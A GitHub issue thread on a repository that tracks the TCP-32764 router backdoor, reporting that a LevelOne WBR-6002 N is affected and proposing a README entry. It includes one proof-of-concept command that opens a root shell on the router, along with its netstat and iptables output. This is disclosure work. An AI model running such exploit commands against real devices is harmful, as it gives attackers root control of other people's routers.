elvanderb / TCP-32764

Some code and notes about the backdoor listening on TCP-32764 in Linksys WAG200G.

LevelOne WBR-6002 N is affected too, but not listed in README.md #107

Open azazar opened 8 years ago

azazar commented 8 years ago

Backdoor is working and listening on the internet on LevelOne WBR-6002 N.

$ ./poc.py  --ip=192.168.0.1 --shell
welcome, here is a root shell, have fun

iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 *:49152                 *:*                     LISTEN      
tcp        0      0 *:80                    *:*                     LISTEN      
tcp        0      0 *:32764                 *:*                     LISTEN      
udp        0      0 localhost.localdom:3073 *:*                                 
udp        0      0 *:23460                 *:*                                 
udp        0      0 *:1900                  *:*                                 
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node Path

jay commented 8 years ago

As noted, the README isn't being updated manually any longer. You may make a pull request and reference this issue in the 'LISTENING ON THE INTERNET' section, for example:

diff --git a/README.md b/README.md
index 3cfa9f1..5674552 100644
--- a/README.md
+++ b/README.md
@@ -27,6 +27,7 @@ Backdoor **LISTENING ON THE INTERNET** confirmed in :
 - Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 ([issue 44](https://github.com/elvanderb/TCP-32764/issues/44))
 - Netgear WPNT834 ([issue 79](https://github.com/elvanderb/TCP-32764/issues/79))
 - OpenWAG200 maybe a little bit TOO open ;) ([issue 49](https://github.com/elvanderb/TCP-32764/issues/49))
+- LevelOne WBR-6002 N ([issue 107](https://github.com/elvanderb/TCP-32764/issues/107))

 Backdoor confirmed in:
 - Cisco RVS4000 fwv 2.0.3.2 & 1.3.0.5 ([issue 57](https://github.com/elvanderb/TCP-32764/issues/57))
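
Review bot: The added `LevelOne WBR-6002 N` line gives no firmware version, unlike the Netgear DGN2000 line above it and the Cisco RVS4000 line below, so the entry cannot be tied to a specific build; add the version once the reporter supplies it. The section heading also claims Internet exposure, while the issue's transcript shows the PoC run against 192.168.0.1; the `*:32764` bind and the empty INPUT chain are consistent with WAN reachability, but a check from the WAN side would make the placement under this heading verifiable.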

Also, it would be helpful to know the firmware.